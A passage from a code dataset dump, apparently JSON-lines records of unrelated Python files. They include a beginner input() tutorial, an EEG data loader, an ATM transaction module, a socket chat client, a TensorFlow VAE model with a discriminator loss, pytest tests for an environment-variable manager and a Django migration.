","sub_path":"models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"279804017","text":"# input() pauses your program and waits for the user to enter information\r\n# after the user enters info, python ties it to a variable to continue working with it\r\n\r\nmessage = input(\"Tell me something and I will repeat it back to you: \")\r\nprint(message)\r\n\r\n# the text inside input() is shown to the user, then after they enter something, it prints that as message\r\n\r\nname = input(\"Please type your full name: \")\r\nprint(f'\\nHello, {name}')\r\n\r\n# if you want to write a multi-line prompt, assign it to a variable and use that as your input message\r\n\r\nprompt = 'If you tell us your first and last name, we can personalize what you see'\r\nprompt += '\\nWhat is your first name?: '\r\n\r\nName = input(prompt)\r\nprint(f'Hello, {Name}!')\r\n\r\n# input() only accepts values entered by the user as string formats\r\n# the int() function converts your input() string to an integer\r\n\r\nage = input('How old are you: ')\r\nage = int(age)\r\nage >= 18\r\n\r\n# input tool using int() to determine what shoe size to wear at your store\r\n\r\nshoe_size = input(\"Please enter your normal shoe size: \")\r\nshoe_size = int(shoe_size)\r\n\r\nif shoe_size > 10:\r\n    print('Your suggested shoe size is Large')\r\nelif shoe_size > 4 and shoe_size <= 10:\r\n    print('Your suggested shoe size is Medium')\r\nelse:\r\n    print('Your suggested shoe size is Small')\r\n\r\n# modulo operator 
% will divide numbers and offer the remainder\r\n\r\n4%2\r\n7%2\r\n121%2\r\n\r\nnumber = input('Type any number here: ')\r\nnumber = int(number)\r\n\r\nif number % 2 == 0:\r\n    print('the number is even')\r\nelse:\r\n    print('the number is odd')\r\n\r\n","sub_path":"python_bootcamp/chapter_7/Input() function.py","file_name":"Input() function.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"174840511","text":"# -*- coding:UTF-8 -*-\nimport os\nimport math\nimport numpy as np\nimport scipy.io as scio\n\ndef get_samples_data(path, trial_list, windows=4, overlapping=3):\n    '''\n    windows: length of each sliding time window\n    overlapping: overlap length between adjacent windows\n    '''\n    datas = [] \n    labels = []\n    data = scio.loadmat(path+\"data1.mat\")\n    label = scio.loadmat(path+\"label.mat\")[\"label\"] # shape = (1, 15)\n    step = windows - overlapping\n    for i in trial_list:\n        data_channel = data[\"de_LDS\"+str(i)].transpose((1,0,2))\n        data_channel = data_channel.reshape(data_channel.shape[0], -1) # shape = (samples, 310)\n        data_label = label[0][i-1] + 1\n        numbers_single_trial = int((data_channel.shape[0] - windows) / step + 1)\n        for iterator in range(numbers_single_trial):\n            datas.append(data_channel[iterator*step:iterator*step + windows,:])\n            labels.append(data_label)\n    print(\"Get sample data success!\")\n    print(\"Total sample number is: \", len(labels))\n    print(\"label 0: {} label 1: {} label 2: {}.\".format(np.sum(np.array(labels)==0), \n                                                        np.sum(np.array(labels)==1), \n                                                        np.sum(np.array(labels)==2)))\n    return (datas, labels)\n\ndef index_generator(num_examples, batch_size, seed=0):\n    '''This function generates the indices for each batch.'''\n    np.random.seed(seed)\n    permutation = list(np.random.permutation(num_examples))\n    num_complete_minibatches = math.floor(num_examples/batch_size)\n    for k in range(0, num_complete_minibatches):\n        X_batch_index = permutation[k*batch_size:(k+1)*batch_size]\n        y_batch_index = permutation[k*batch_size:(k+1)*batch_size]\n        yield (X_batch_index, y_batch_index)\n    if num_examples % batch_size != 0:\n        X_batch_index = permutation[num_complete_minibatches*batch_size:num_examples]\n        y_batch_index = permutation[num_complete_minibatches*batch_size:num_examples]\n        yield (X_batch_index, y_batch_index)\n\ndef read_data(path=\"../new_RNN/\", trial_list=list(range(1, 16)), windows=9, overlapping=8):\n    # datas and labels are both lists. Each item in datas is an array of shape=(32, 128*windows)\n    datas, labels = get_samples_data(path, trial_list, windows, overlapping)\n    return (datas, labels)\n","sub_path":"Emotion/model_1th/new_TCN/data_seed.py","file_name":"data_seed.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"113875670","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport io\r\nfrom datetime import datetime\r\n\r\n#p\r\ndef Rating_timestamp(in_file_path):\r\n    source = io.open(in_file_path, mode=\"r\", encoding=\"utf-8\")\r\n    content = source.readlines()\r\n    output = open(\"./latest/converted\" + in_file_path[8:-4] + \"_out.txt\", mode=\"w+\",encoding=\"utf-8\")\r\n    \r\n    for line in content:\r\n        line_elements = line.split(\"::\")\r\n        output.write(\"^\".join(line_elements[0:3] + [datetime.fromtimestamp(int(line_elements[3])).strftime(\"%d/%m/%Y\")]) + '\\n')\r\n    \r\n    \r\n    output.close()\r\n    source.close()\r\n    \r\nRating_timestamp(\"./latest/ratings.dat\")\r\n","sub_path":"timestamp.py","file_name":"timestamp.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"138484633","text":"import numpy as np\nimport pandas\nimport os\nfrom collections import Counter\n\ndef get_data_path():\n\t'''\n\treturn the path of the data to load into a numpy array.\n\t'''\n\tparent_path = os.path.pardir\n\tdata_path = parent_path + \"/TripAdvisorChallenge/datathon_tadata.csv\"\n\treturn data_path\n\ndef clean_data():\n\t'''\n\tclean the data to do machine learning.\n\t'''\n\t# print(get_data_path())\n\tdata = pandas.read_csv(get_data_path()).as_matrix()\n\toperating_system_column = data[:, 10]\n\tc = Counter(operating_system_column)\n\tprint(list(c.most_common()))\n\treturn data\n\ndef map_to_matrix():\n\t'''\n\tconsumes an iterable and uses collections.Counter to return a matrix of numbers according to the class.\n\n\tExample\n\tinput:\n\t['windows',\n\t'mac',\n\t'linux',\n\t'mac',\n\t'linux',\n\t'linux']\n\n\treturn: an n x m matrix, n being the length of the original iterable and m being the number of unique classes--in this example, n = 6 and m = 3.\n\n\tLet the ith row, jth column element be 1 if the ith element in the input belongs to class j. 
Otherwise make everything 0.\n\n\tIn this case, let class 0 = linux, class 1 = mac, class 2 = windows.\n\n\tThen the return value should be a numpy matrix as follows:\n\n\t0\t0\t1\n\t0\t1\t0\n\t1\t0\t0\n\t0\t1\t0\n\t1\t0\t0\n\t1\t0\t0\n\t'''\n\nif __name__ == '__main__':\n\tdata = clean_data()\n\t# print(data[0, 1]) # should be 2017-01-10\n","sub_path":"data_clean.py","file_name":"data_clean.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"31953304","text":"#!/usr/bin/env python\n# Author:Zhangmingda\nimport time\nfrom conf import settings\nfrom atm import account,loger\n\ndef trans_action(account_data,trans_type,amount,**kwargs):\n    \"\"\"\n    :param account_data: detailed user account data\n    :param trans_type: transaction type\n    :param amount: transaction amount\n    :param kwargs: reserved for future use\n    :return: the new account data after saving; returns None if saving fails\n    \"\"\"\n    amount = float(amount)\n    old_balance = account_data['balance']\n    if trans_type in settings.TRANSACTION_TYPE:\n        interest = amount * settings.TRANSACTION_TYPE[trans_type]['interest']\n        if settings.TRANSACTION_TYPE[trans_type]['action'] == 'plus':\n            new_balance = old_balance + amount + interest\n        elif settings.TRANSACTION_TYPE[trans_type]['action'] == 'minus':\n            new_balance = old_balance - amount - interest\n        if new_balance >= 0 :\n            account_data['balance'] = new_balance\n            now_account_info = account.dump_account(account_data)\n            loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + trans_type +\"%s Successful now Balance is %s\\n\" % ( amount, now_account_info['balance'])\n            # loger.loger(loginfo)\n            return now_account_info\n        else:\n            print('\\033[31;1mYour balance is insufficient for this transaction!!!\\033[0m')\n            return\n\ndef trans_action_reciprocal(account_data,trans_type,amount,reciprocal,**kwargs):\n    \"\"\"\n    :param account_data: detailed user account data\n    :param trans_type: transaction type\n    :param amount: transaction amount\n    :param reciprocal: the counterparty account\n    :param kwargs: reserved for future use\n    :return: the new account data after saving; returns None if saving fails\n    \"\"\"\n    old_balance = account_data['balance']\n    now_account_info = trans_action(account_data, trans_type, amount)\n    # loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"Transferred to %s: %s yuan, balance %s\\n\" % (reciprocal, amount, now_account_info['balance'])\n    # loger.loger(loginfo)\n    if now_account_info:\n        amount = float(amount)\n        reciprocal_account_info = account.load_balance(reciprocal)\n        if reciprocal_account_info:\n            reciprocal_account_info['balance'] = reciprocal_account_info['balance'] + amount\n            trans_result = account.dump_account(reciprocal_account_info)\n            if trans_result:\n                print(\"\\033[32;1mTransfer to the counterparty succeeded\\033[0m\")\n                loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"Transferred to %s: %s yuan, balance %s\\n\" % (reciprocal,amount,now_account_info['balance'])\n                print(loginfo)\n                loger.loger(loginfo)\n                return now_account_info\n            else:\n                print('\\033[31;1mTransfer to the counterparty failed, funds returned\\033[0m')\n                account_data['balance'] = old_balance\n                now_account_info = account.dump_account(account_data)\n                loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"Transfer to %s of %s yuan failed and was refunded, balance %s\\n\" % (reciprocal, amount, now_account_info['balance'])\n                loger.loger(loginfo)\n                return now_account_info\n        else:\n            print('\\033[31;1mOperation failed\\033[0m')\n            print('old_balance:',old_balance)\n            account_data['balance'] = old_balance\n            now_account_info = account.dump_account(account_data)\n            loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"Transfer to %s of %s yuan failed and was refunded, balance %s\\n\" % (\n                reciprocal, amount, now_account_info['balance'])\n            loger.loger(loginfo)\n            return now_account_info\n    else:\n        
return\n\n\n\n","sub_path":"day4/Atm/atm/trans_action.py","file_name":"trans_action.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"270512959","text":"#! /usr/bin/env python\r\n# -*-coding:Utf-8 -*\r\n\r\n\"\"\"\r\nAUTHOR: SOW THIERNO HAMIDOU\r\nIRC Chat Client\r\n1. Listen for incoming messages from the server.\r\n2. Check for user input.\r\n\"\"\"\r\nimport socket, select, string, sys\r\n\r\ndef prompt():\r\n\tsys.stdout.write('')\r\n\tsys.stdout.flush()\r\n\r\n\r\nif __name__ == '__main__':\r\n\t\r\n\tif(len(sys.argv) < 3) :\r\n\t\tprint(\"Usage: python client_chat.py hostname port\")\r\n\t\tsys.exit()\r\n\r\n\thost = sys.argv[1]\r\n\tport = int(sys.argv[2])\r\n\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\ts.settimeout(2)\r\n\r\n\t# Connect to the host\r\n\ttry:\r\n\t\ts.connect((host, port))\r\n\texcept :\r\n\t\tprint(\"Unable to connect to the host\")\r\n\t\tsys.exit()\r\n\r\n\tprint(\"Connected to the host, you can start sending messages\")\r\n\tprompt()\r\n\r\n\twhile 1:\r\n\t\tsocket_list = [sys.stdin, s]\r\n\r\n\t\tread_sockets, write_sockets, error_sockets = select.select(socket_list, [], [],60)\r\n\r\n\t\tfor sock_ready in read_sockets:\r\n\r\n\t\t\tif sock_ready == s:\r\n\t\t\t\tdata = sock_ready.recv(4096)\r\n\t\t\t\tif not data :\r\n\t\t\t\t\tprint(\"\\nDisconnected from the chat server\")\r\n\t\t\t\t\tsys.exit()\r\n\t\t\t\telse :\r\n\r\n\t\t\t\t\tsys.stdout.write(data)\r\n\t\t\t\t\tprompt()\r\n\r\n\t\t\telse :\r\n\t\t\t\tmsg = sys.stdin.readline()\r\n\t\t\t\ts.send(msg)\r\n\t\t\t\tprompt()\r\n\r\n\r\n","sub_path":"client_chat.py","file_name":"client_chat.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"642397589","text":"# -*- coding:utf-8 -*-\nimport logging\n\nCONFIG = {\n    'version': 1,\n    # 'disable_existing_loggers': False,\n    'root': {\n        'handlers': ['console', 'file', ],\n        #'handlers': ['console', ],\n        'level': logging.DEBUG,\n    },\n    'loggers': {\n        'googleapiclient': {\n            'handlers': ['console'],\n            'level': logging.WARN,\n            'propagate': False,\n        },\n        'oauth2client': {\n            'handlers': ['console'],\n            'level': logging.WARN,\n            'propagate': False,\n        }\n    },\n    'handlers': {\n        'console': {\n            'class': 'logging.StreamHandler',\n            'level': logging.DEBUG,\n            'formatter': 'standard',\n            'stream': 'ext://sys.stdout',\n        },\n        'file': {\n            'class': 'logging.FileHandler',\n            'level': logging.INFO,\n            'formatter': 'standard',\n            'filename': 'logs/python.log',\n            #'maxBytes': 10240,\n            #'backupCount': 3\n        },\n    },\n    'formatters': {\n        'standard': {\n            'format': '%(asctime)s - %(levelname)-8s - %(filename)s:%(lineno)d - %(name)s - %(message)s',\n        },\n    },\n\n}\n","sub_path":"src/module/config/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"186528613","text":"import os\nimport sys\nfrom PIL import Image\nimport datetime\nsys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), '../..'))\n\nfrom utils.general_class import ModelPlugin\nfrom utils.ortools_op import SolveMaxMatching\nfrom utils.visual_op import matrix_image2big_image\nfrom utils.writer_op import write_pkl, write_gif, write_npy\nfrom utils.tqdm_op import tqdm_range\nfrom utils.eval_op import DisentanglemetricFactorMask, DisentanglemetricFactorJointMask\nfrom utils.np_op import 
np_softmax\n\nfrom tfops.transform_op import apply_tf_op, apply_tf_op_multi_output, apply_tf_op_multi_input\nfrom tfops.train_op import get_train_op_v2\nfrom tfops.lr_op import DECAY_DICT, DECAY_PARAMS_DICT\nfrom tfops.nets import encoder1_64\nfrom tfops.nets import decoder1_64\nfrom local_nets import disc_net_64, disc_net_64_simple\nfrom tfops.loss import sigmoid_cross_entropy_without_mean, vae_kl_cost_weight\n\nimport tensorflow as tf\nimport numpy as np\n\nclass Model(ModelPlugin):\n def __init__(self, dataset, logfilepath, args):\n super().__init__(dataset, logfilepath, args)\n self.build()\n\n def build(self):\n self.logger.info(\"Model building starts\")\n tf.reset_default_graph()\n tf.set_random_seed(self.args.rseed)\n\n self.input1 = tf.placeholder(tf.float32, shape = [self.args.nbatch, self.height, self.width, self.nchannel])\n self.epsilon_input = tf.placeholder(tf.float32, shape=[self.args.nbatch, self.args.nconti])\n self.objective = tf.placeholder(tf.float32, shape = [self.args.nbatch, self.args.ncat])\n self.istrain = tf.placeholder(tf.bool, shape= [])\n self.I_weight = tf.placeholder(tf.float32, shape = [])\n self.F_weight = tf.placeholder(tf.float32, shape = [])\n\n # For VC-Loss\n self.delta_dim = tf.placeholder(tf.int32, shape=[self.args.nbatch])\n self.objective_2_idx = tf.placeholder(tf.int32, shape = [self.args.nbatch, self.args.ncat])\n\n self.generate_sess()\n\n self.mcf = SolveMaxMatching(nworkers=self.args.nbatch, ntasks=self.args.ncat, k=1, pairwise_lamb=self.args.plamb)\n # Encoding\n self.encoder_net = encoder1_64\n self.decoder_net = decoder1_64\n if self.args.disc_type == 'simple':\n self.disc_net = disc_net_64_simple\n else:\n self.disc_net = disc_net_64\n\n # Continuous rep\n self.mean_total, self.stddev_total = tf.split(self.encoder_net(self.input1, output_dim=2*self.args.nconti, scope='encoder', reuse=False)['output'], num_or_size_splits=2, axis=1)\n self.stddev_total = tf.nn.softplus(self.stddev_total)\n self.z_sample = tf.add(self.mean_total, tf.multiply(self.stddev_total, self.epsilon_input))\n\n # For VC-Loss\n self.z_delta = tf.cast(tf.one_hot(self.delta_dim, self.args.nconti), self.z_sample.dtype)\n rand_eps = tf.random.normal([self.args.nbatch, 1], mean=0.0, stddev=self.args.delta_std)\n self.delta_target = self.z_delta * rand_eps\n self.z_added = self.delta_target\n self.z_added = self.z_added + self.z_sample\n\n self.dec_output_dict = self.decoder_net(z=tf.concat([self.z_sample, self.objective], axis=-1), output_channel=self.nchannel, scope=\"decoder\", reuse=False)\n self.dec_output = self.dec_output_dict['output']\n self.feat_output = self.dec_output_dict['deconv2d2']\n self.F_loss = tf.reduce_mean(self.feat_output * self.feat_output)\n # self.F_loss = self.args.F_beta * self.F_loss\n self.F_loss = 0.\n\n # self.objective_2 = tf.cast(tf.one_hot(self.objective_2_idx, self.args.ncat), self.z_added.dtype)\n self.objective_2 = tf.cast(self.objective_2_idx, self.z_added.dtype)\n self.dec_output_2 = self.decoder_net(z=tf.concat([self.z_added, self.objective_2], axis=-1), output_channel=self.nchannel, scope=\"decoder\", reuse=True)['output']\n self.disc_output = self.disc_net(img1=self.dec_output, img2=self.dec_output_2, target_dim=self.args.nconti, scope='discriminator', reuse=False)['output']\n\n # Loss VC CEloss\n self.disc_prob = tf.nn.softmax(self.disc_output, axis=1)\n self.I_loss = tf.reduce_mean(tf.reduce_sum(self.z_delta * tf.log(self.disc_prob + 1e-12), axis=1))\n self.I_loss = - self.args.C_lambda * self.I_loss\n # Loss VC MSEloss\n # 
self.I_loss = tf.reduce_mean(tf.reduce_sum((self.disc_output - self.delta_target) ** 2, axis=1))\n # self.I_loss = self.args.C_lambda * self.I_loss\n\n # Unary vector\n self.rec_cost_vector = sigmoid_cross_entropy_without_mean(labels=self.input1, logits=self.dec_output)\n\n # Loss\n self.rec_cost = tf.reduce_mean(self.rec_cost_vector)\n\n self.loss_dict = dict()\n for idx in range(self.args.nconti+1):\n weight = tf.constant(np.array(idx*[self.args.beta_min] + (self.args.nconti-idx)*[self.args.beta_max]), dtype=tf.float32)\n kl_cost = vae_kl_cost_weight(mean=self.mean_total, stddev=self.stddev_total, weight=weight)\n self.loss_dict[idx] = self.rec_cost+kl_cost+tf.losses.get_regularization_loss()+\\\n self.I_loss*self.I_weight+self.F_loss*self.F_weight\n\n tf.summary.scalar('rec_loss', self.rec_cost)\n tf.summary.scalar('I_loss', self.I_loss)\n tf.summary.scalar('F_loss', self.F_loss)\n self.merged = tf.summary.merge_all()\n\n # Decode\n self.latent_ph = tf.placeholder(tf.float32, shape = [self.args.nbatch, self.args.nconti+self.args.ncat])\n self.dec_output_ph = tf.nn.sigmoid(self.decoder_net(z=self.latent_ph, output_channel=self.nchannel, scope=\"decoder\", reuse=True)['output'])\n\n # Free Batch Decode\n self.free_latent_ph = tf.placeholder(tf.float32, shape = [None, self.args.nconti+self.args.ncat])\n self.free_dec_output_ph = tf.nn.sigmoid(self.decoder_net(z=self.free_latent_ph, output_channel=self.nchannel, scope=\"decoder\", reuse=True)['output'])\n\n self.logger.info(\"Model building ends\")\n\n def decode(self, latent_input):\n return apply_tf_op(inputs=latent_input, session=self.sess, input_gate=self.latent_ph, output_gate=self.dec_output_ph, batch_size=self.args.nbatch)\n\n def set_up_train(self):\n self.logger.info(\"Model setting up train starts\")\n\n if not hasattr(self, 'start_iter'): self.start_iter = 0\n self.logger.info(\"Start iter: {}\".format(self.start_iter))\n\n decay_func = DECAY_DICT[self.args.dtype]\n decay_params = DECAY_PARAMS_DICT[self.args.dtype][self.args.nbatch][self.args.dptype].copy() \n decay_params['initial_step'] = self.start_iter\n\n self.lr, update_step_op = decay_func(**decay_params)\n self.update_step_op = [update_step_op]\n\n var_list = [v for v in tf.trainable_variables() if 'encoder' in v.name] + \\\n [v for v in tf.trainable_variables() if 'decoder' in v.name] + \\\n [v for v in tf.trainable_variables() if 'discriminator' in v.name]\n\n self.train_op_dict = dict()\n with tf.control_dependencies(tf.get_collection(\"update_ops\")):\n for idx in range(self.args.nconti+1):\n self.train_op_dict[idx] = get_train_op_v2(tf.train.AdamOptimizer(learning_rate=self.lr, beta1=0.9, beta2=0.999), loss=self.loss_dict[idx], var_list=var_list)\n\n self.logger.info(\"Model setting up train ends\")\n\n def run_batch(self, train_idx):\n feed_dict = dict()\n feed_dict[self.input1] = self.dataset.next_batch(batch_size=self.args.nbatch)[0]\n feed_dict[self.istrain] = True\n feed_dict[self.epsilon_input] = np.random.normal(size=[self.args.nbatch, self.args.nconti])\n\n # For VC-Loss\n feed_dict[self.delta_dim] = np.random.randint(0, self.args.nconti, size=[self.args.nbatch])\n if self.args.switch_dis:\n objective_2_idx = np.random.randint(0, self.args.ncat, size=[self.args.nbatch])\n blank = np.zeros((objective_2_idx.size, self.args.ncat))\n blank[np.arange(objective_2_idx.size), objective_2_idx] = 1\n feed_dict[self.objective_2_idx] = blank\n\n if train_idx=self.args.ntime:\n idx = min(train_idx, self.args.nconti)\n else: \n idx = min(train_idx+1, self.args.nconti)\n # 
_, total_loss, rec_loss, I_loss, F_loss = self.sess.run([self.train_op_dict[idx], \n # self.loss_dict[idx], self.rec_cost, self.I_loss, self.F_loss], feed_dict=feed_dict)\n summary, _ = self.sess.run([self.merged, self.train_op_dict[idx]], feed_dict=feed_dict)\n return summary\n\n def train(self, niter, piter, siter, save_dir=None, asset_dir=None):\n self.logger.info(\"Model training starts\")\n current_time = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n train_log_dir = os.path.join(asset_dir, current_time, 'train')\n # test_log_dir = os.path.join(asset_dir, current_time, '/test')\n train_summary_writer = tf.summary.FileWriter(train_log_dir, self.sess.graph)\n\n final_iter = self.start_iter+niter\n max_accuracy = -1\n max_acc_iter = -1\n\n for iter_ in tqdm_range(self.start_iter, final_iter):\n train_idx = (iter_ - self.start_iter)//piter\n summary = self.run_batch(train_idx)\n train_summary_writer.add_summary(summary, iter_)\n\n if (iter_+1)%siter==0 or iter_+1==final_iter:\n include_discrete = False if train_idx < self.args.ntime else True\n accuracy = self.evaluate(include_discrete=include_discrete)\n\n self.latent_traversal_gif(path=asset_dir+'{}.gif'.format(iter_+1), include_discrete=include_discrete)\n if max_accuracy==-1 or max_accuracy 0, z_2, z_1)\n delta_z = z_1 - z_2\n if i == 0:\n labels = delta_z\n else:\n labels = np.concatenate([labels, delta_z], axis=0)\n\n if include_discrete:\n cat_dim = np.random.randint(0, self.args.ncat, size=[batch_size])\n cat_onehot = np.zeros((batch_size, self.args.ncat))\n cat_onehot[np.arange(cat_dim.size), cat_dim] = 1\n else:\n cat_onehot = np.zeros((batch_size, self.args.ncat))\n img_1 = self.sess.run(self.free_dec_output_ph, \n feed_dict={self.free_latent_ph: \n np.concatenate([z_1, cat_onehot], axis=1)})\n img_2 = self.sess.run(self.free_dec_output_ph, \n feed_dict={self.free_latent_ph: \n np.concatenate([z_2, cat_onehot], axis=1)})\n # [b, h, w, c]\n for j in range(img_1.shape[0]):\n pair_np = np.concatenate([img_1[j], img_2[j]], axis=1)\n pair_np = (pair_np * 255).astype(np.uint8)\n img = Image.fromarray(pair_np)\n img.save(os.path.join(pairs_path, 'pair_%06d.jpg' % (i * batch_size + j)))\n # if i == 0:\n # imgs = np.concatenate([img_1, img_2], axis=2)\n # else:\n # imgs_i = np.concatenate([img_1, img_2], axis=2)\n # imgs = np.concatenate([imgs, imgs_i], axis=0)\n\n write_npy(labels, os.path.join(pairs_path, 'labels.npy'))\n # write_npy((imgs * 255).astype(np.uint8), os.path.join(pairs_path, 'imgs.npy'))\n # np.savez_compressed(os.path.join(pairs_path, 'imgs.npy'), (imgs * 255).astype(np.uint8))\n","sub_path":"Dsprites_exp/CascadeVAE-VC/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"551079101","text":"import pytest\n\nfrom envmanager.decorators import env_loader\nfrom envmanager.tests.data import envloader_config_from_dict_multiapp\n\nconfig = envloader_config_from_dict_multiapp\n\n\"\"\"\nTests use of dictionary schema:\n - Set, retrieve and clear string keys and assert string values (as-is)\n - Get and clear schema keys and assert schema dictated types and expected values\n\"\"\"\n\n\n@pytest.fixture\ndef env():\n @env_loader(config)\n def inner():\n from envmanager.core import Env\n return Env(config)\n\n return inner()\n\n\ndef test_set_value(env):\n env.set('my_key', 1234)\n res = env.int('my_key')\n assert res == 1234, \"testing setting custom string my_key failed\"\n assert env.clear('my_key') 
is True, \"testing setting custom string when mode popped\"\n # cannot retrieve anymore or throws an error\n\n\ndef test_get_same_key_from_group_1(env):\n with env.group('GROUP1'):\n res = env('duplicate_string')\n assert res == 'dups', \"test get duplicate_string failed\"\n assert env.clear('duplicate_string') is True, \"test get when duplicate_string popped\"\n # cannot retrieve anymore or throws an error\n\n\ndef test_get_same_key_from_group_2(env):\n with env.group('GROUP2'):\n res = env('duplicate_string')\n assert res == 'dups2', \"test get duplicate_string failed\"\n assert env.clear('duplicate_string') is True, \"test get when duplicate_string popped\"\n # cannot retrieve anymore or throws an error\n\n\ndef test_get_same_key_from_group_both(env):\n with env.group('GROUP2'):\n res = env('duplicate_string')\n assert res == 'dups2', \"test get duplicate_string failed\"\n assert env.clear('duplicate_string') is True, \"test get when duplicate_string popped\"\n # cannot retrieve anymore or throws an error\n with env.group('GROUP1'):\n res = env('duplicate_string')\n assert res == 'dups', \"test get duplicate_string failed\"\n assert env.clear('duplicate_string') is True, \"test get when duplicate_string popped\"\n # cannot retrieve anymore or throws an error\n\n\ndef test_get_prepended_keys_from_group_1(env):\n with env.group('GROUP1'):\n with env.prepend('zero'):\n res = env('one')\n assert res == 'one', \"test get zero_one failed\"\n assert env.clear('one') is True, \"test get when zero_one popped\"\n with env.prepend('one'):\n res = env('two')\n assert res == 'two', \"test get zero_one failed\"\n assert env.clear('two') is True, \"testing setting when zero_one popped\"\n","sub_path":"envmanager/tests/test_multi_group.py","file_name":"test_multi_group.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"441070206","text":"import json \nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom stable_baselines3.common.results_plotter import X_EPISODES, ts2xy, window_func\n\ndef save_rewards(log_dir, num_drones, num_episodes):\n file_name = f\"{num_drones}_{num_episodes}.monitor.csv\"\n headers = []\n with open(log_dir + file_name, \"rt\") as file_handler:\n first_line = file_handler.readline()\n assert first_line[0] == \"#\"\n header = json.loads(first_line[1:])\n data_frame = pandas.read_csv(file_handler, index_col=None)\n headers.append(header)\n data_frame[\"t\"] += header[\"t_start\"]\n data_frame.sort_values(\"t\", inplace=True)\n data_frame[\"t\"] -= min(header[\"t_start\"] for header in headers)\n\n (x,y) = ts2xy(data_frame, X_EPISODES)\n\n plt.figure(\"Coverage Mission\", figsize=(8, 2))\n max_x = x[-1]\n min_x = 0\n plt.scatter(x, y, s=2)\n # Compute and plot rolling mean with window of size EPISODE_WINDOW\n x, y_mean = window_func(x, y, 25, np.mean)\n plt.plot(x, y_mean)\n plt.xlim(min_x, max_x)\n plt.title(f\"Coverage Mission | {num_drones} Drones | {num_episodes} Episodes\")\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Episode Reward\")\n plt.tight_layout()\n plt.savefig(log_dir + f\"rewards_{num_drones}_{num_episodes}\")","sub_path":"TG/rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52425397","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport 
django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Amigo',\n fields=[\n ('amigo_pk', models.AutoField(primary_key=True, serialize=False)),\n ],\n options={\n 'db_table': 'amigo',\n },\n ),\n migrations.CreateModel(\n name='EstructuraGramatical',\n fields=[\n ('estructura_gramatical_pk', models.AutoField(primary_key=True, serialize=False)),\n ('nombre', models.CharField(max_length=100)),\n ],\n options={\n 'db_table': 'estructura_gramatical',\n },\n ),\n migrations.CreateModel(\n name='FraseGramatical',\n fields=[\n ('frase_gramatical_pk', models.AutoField(primary_key=True, serialize=False)),\n ('frase', models.CharField(max_length=500)),\n ('estructura_gramatical_fk', models.ForeignKey(db_column='estructura_gramatical_fk', to='thomas.EstructuraGramatical', on_delete=django.db.models.deletion.PROTECT)),\n ],\n options={\n 'db_table': 'frase_gramatical',\n },\n ),\n migrations.CreateModel(\n name='Rol',\n fields=[\n ('rol_pk', models.AutoField(primary_key=True, serialize=False)),\n ('nombre', models.CharField(max_length=45)),\n ],\n options={\n 'db_table': 'rol',\n },\n ),\n migrations.CreateModel(\n name='Usuario',\n fields=[\n ('usuario_pk', models.AutoField(primary_key=True, serialize=False)),\n ('dni', models.CharField(max_length=45)),\n ('nombre', models.CharField(max_length=45)),\n ('apellido1', models.CharField(max_length=45)),\n ('apellido2', models.CharField(max_length=45, null=True)),\n ('username', models.CharField(max_length=45)),\n ('password', models.CharField(max_length=45)),\n ('activo', models.NullBooleanField()),\n ('mail', models.EmailField(max_length=45, null=True)),\n ('fotografia', models.ImageField(upload_to='', null=True)),\n ],\n options={\n 'db_table': 'usuario',\n },\n ),\n migrations.CreateModel(\n name='UsuarioRol',\n fields=[\n ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),\n ('rol_fk', models.ForeignKey(db_column='rol_fk', to='thomas.Rol', on_delete=django.db.models.deletion.PROTECT)),\n ('usuario_fk', models.ForeignKey(db_column='usuario_fk', to='thomas.Usuario', on_delete=django.db.models.deletion.PROTECT)),\n ],\n options={\n 'db_table': 'usuario_rol',\n },\n ),\n migrations.CreateModel(\n name='Word',\n fields=[\n ('word_pk', models.AutoField(primary_key=True, serialize=False)),\n ('name', models.CharField(max_length=100)),\n ('translation', models.CharField(max_length=200)),\n ('comment', models.TextField(null=True)),\n ('favorite', models.NullBooleanField()),\n ],\n options={\n 'db_table': 'word',\n },\n 